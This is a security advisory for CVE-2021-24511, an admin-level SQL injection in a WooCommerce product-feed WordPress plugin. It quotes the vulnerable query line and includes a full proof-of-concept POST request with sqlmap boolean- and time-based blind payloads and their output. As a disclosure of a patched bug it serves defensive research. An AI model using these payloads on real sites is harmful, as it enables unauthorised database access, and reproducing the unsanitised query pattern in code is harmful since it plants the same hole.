wp-plugin : purple-xmls-google-product-feed-for-woocommerce | Code Vigilant : to err is human.. To fix is Humanity

Wp Plugin Purple Xmls Google Product Feed for Woocommerce

Plugin Details

Plugin Name: wp-plugin : purple-xmls-google-product-feed-for-woocommerce

Effected Version : 3.3.0.3 (and most probably lower version's if any)

Vulnerability : Injection

Minimum Level of Access Required : Administrator

CVE Number : CVE-2021-24511

Identified by : Syed Sheeraz Ali

WPScan Reference URL

Disclosure Timeline

May 9, 2021: Issue Identified and Disclosed to WPScan
May 31, 2021 : Plugin Updated
June 10, 2021 : CVE Assigned
August 22, 2021 : Public Disclosure

Technical Details

Vulnerable File: /core/ajax/wp/fetch_product_ajax.php#352

Vulnerable Code block and parameter:

Administrator level SQLi for parameter product_id

Vulnerable Code: /core/ajax/wp/fetch_product_ajax.php#352

352:        $check = $wpdb->get_row("SELECT COUNT(product_id) as count FROM $table_name WHERE product_id = " . sanitize_text_field($_POST['product_id']));

Fixed Commit: https://plugins.trac.wordpress.org/changeset/2532093/

PoC Screenshots

Steps to reproduce

we do not know how to reach this Parameter from the UI so these are the steps how we reched it after code review. install woocommrece and this plugin then go to create feed go to custom product feed and search something capture the requst in burp change the q params value to given value savep and add these two params with it id Parameter will have a sqli.

&q=savep&local_cat_ids=1&product_id=1

Exploit

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 172.28.128.50
Content-Length: 162
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-GPC: 1
Origin: http://172.28.128.50
Referer: http://172.28.128.50/wp-admin/admin.php?page=cart-product-feed-admin
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1620443683%7C2MZuCYsK7cynrQu2tWF9whgE1vtkxLnVPFHiGsJ9Fi0%7C1471328ee46323d87aa594ee1c6acb9ed6f70fbc9942f0148ff45ad621d76e57; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AiQVT6EvbuCedvp65Wb1%2BuUEl; PHPSESSID=d8f8beced189cdd7cb849dedbb8a8383; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1620443683%7C2MZuCYsK7cynrQu2tWF9whgE1vtkxLnVPFHiGsJ9Fi0%7C1ae6e450dc0b415e0d67668228afb2a7317b368b4ef2f0d49e6cbb4b71a6a811; wp-settings-time-1=1620279779
Connection: close

keyword=eewr&searchfilters=sku&security=c3b54163aa&action=cpf_cart_product&feedpath=core%2Fajax%2Fwp%2Ffetch_product_ajax.php&q=savep&local_cat_ids=1&product_id=1

sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: product_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=eewr&searchfilters=sku&security=c3b54163aa&action=cpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.php&q=savep&local_cat_ids=1&product_id=1 AND 6853=6853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keyword=eewr&searchfilters=sku&security=c3b54163aa&action=cpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.php&q=savep&local_cat_ids=1&product_id=1 AND (SELECT 7403 FROM (SELECT(SLEEP(5)))gJUc)
---
[11:44:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12
[11:44:42] [INFO] fetching current user
[11:44:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:44:42] [INFO] retrieved: bob@localhost
current user: 'bob@localhost'

[*] ending @ 11:44:46 /2021-05-06/